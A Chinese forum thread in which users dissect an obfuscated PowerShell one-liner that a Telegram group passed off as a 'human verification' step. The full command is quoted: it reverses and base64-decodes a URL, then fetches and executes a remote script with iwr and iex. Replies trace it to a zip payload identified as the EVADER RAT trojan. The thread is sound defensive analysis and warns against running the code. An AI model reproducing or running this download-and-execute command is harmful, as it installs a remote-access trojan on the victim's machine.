Window 网络代码分析 | 请不要轻易在自己电脑尝试

有没有 window 高手帮忙看下这个代码干了啥

powershell -c $r='0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')}); 

昨天一个 Telegram 群要验证是否是真人，提供了上面代码，让用户复制粘贴 Win+R 运行，问了下 chatgpt 提示说是执行了一段网络代码，具体是干什么不熟悉 Window 编程没能搞出来。

有没有 Window 高手帮忙看下这代码到底是干啥了，是否有危险操作。

不清楚风险请不要轻易在自己电脑尝试

不清楚风险请不要轻易在自己电脑尝试

不清楚风险请不要轻易在自己电脑尝试

没必要看，肯定有危险操作

"它将变量 $r 中的字符串逆序后再用 Base64 解码，然后通过 iwr 下载并用 iex 执行下载到的远程脚本，属于可疑或恶意行为。" ——ChatGPT 100%在干坏事

@baysonfox https://gist.github.com/baysonfox/bfd431c76e8e1322272d57a2de4eebbc 等高手研究下（

想都不用想肯定有问题，正常验证哪有这样的，字符串反转之后 base64 解码就是 payload 的 url ，看起来像是挖矿的

0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa 这串代码，反过来并用 base64 解码，得到一个脚本的地址： https://i.imgur.com/qdvx6bd.png 这是用 Deepseek 分析出来的 https://i.imgur.com/Z3wi8HD.png

@Greendays 按照 AI 的思路来（这个 AI 反转字符串搞错了），这段代码反转后是： aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudHh0 能匹配的最长的 Base64 编码是： aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudH== 解码出来后确实是一个看上去像是人机验证地址的网页： https://i.imgur.com/kkZec90.png

最终下载 https=x=easypath.cyou/92374ybvt/y79v54822954.zip 执行。

@crab 在电脑里找到这个文件的加压目录了 :( https://i.imgur.com/oXoUXKw.png

https://www.virustotal.com/gui/file/c00e3309331ce9f1ee62c25e450c016f0ce8f38e50eca9f100b30104af9d7e56/behavior EVADER RAT 是木马哈